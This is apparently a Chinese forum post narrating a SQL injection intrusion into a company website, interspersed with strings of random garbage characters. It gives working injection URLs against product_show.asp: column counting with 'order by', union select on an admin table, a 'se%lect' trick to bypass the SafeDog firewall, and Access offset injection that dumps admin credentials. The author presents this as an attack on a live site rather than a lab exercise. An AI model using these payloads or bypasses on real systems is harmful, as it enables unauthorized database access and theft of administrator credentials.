打开网站,一个企业站。4 j: j- `" i6 p) j
) E# E( |: W1 c, @% E% K+ x4 x
" c9 d* ]$ y' H: ? ~顺手加个admin
+ H5 n& L% v; y# S8 o/ ]* ~" c- K3 S- r# u; L$ g$ ~3 i- _
. k V3 N5 V9 M5 E( O( e: @' O默认后台。9 t- j9 l' s3 q* ~6 {$ m
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
& r R* `7 J0 k) Y/ p/ W: u/ T7 ~
& k9 v# M8 U( V; R/ \
0 o" l$ n8 H4 P" f4 P6 x; o# _: `$ M, L4 A, n
所以就不用御剑扫了,待会直接封IP。, O7 o9 I6 F$ O$ c4 u
: q h: S# l5 R用order by语句判断是否存在注入。
* u; n( B$ z I! N, L- G, ]. ghttp://www.xxx.com /product_show.asp?id=997 order by 1
( N, V# g8 F5 thttp://www.xxx.com /product_show.asp?id=997 order by 100
* z H, p: \- H& J% s现在存在注入,经测试后发现是9个字段。0 T7 ~/ e# V+ B# W
/ |4 [6 H# j9 G
接下来进行联合查询,猜是否存在admin表。! @( X; ^( _2 k f
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
7 L$ W N) K! _5 Y# w {8 C3 b q& |' R% \* g# u8 s
; |% L% W( j# }* |1 u# l9 l' {2 X$ U: U
$ J+ e9 g+ z% T在select中间加个%,se%lect绕过安全狗。9 @! j, U6 [8 C; n1 a4 @
0 k% W" _3 }/ U a% v, ^4 S5 @8 R9 _5 B5 X
发现存在admin表,然后开始手工猜常用的字段。, U; ]" M8 J- ~( f) Q
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。/ I2 {( L3 t' S2 y" [1 n% y2 ]
- i6 ?0 C1 U5 L$ |# r# g
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
) R5 c& _; j" W& e; p3 u1 J% u* c 6 s% O& ^2 f5 U1 m
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。6 [- ^" Q: G9 J8 U! ^: J
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin7 U( I, I9 A% `- ]# M* w/ o1 O
好了,敏感内容出显了。
5 x1 L+ z( d9 E& B7 p9 l; R3 ~! {! N0 I# R5 _7 ^
) w/ f% c5 r6 c. b9 d: l+ o; P* K3 C" n$ z) X
|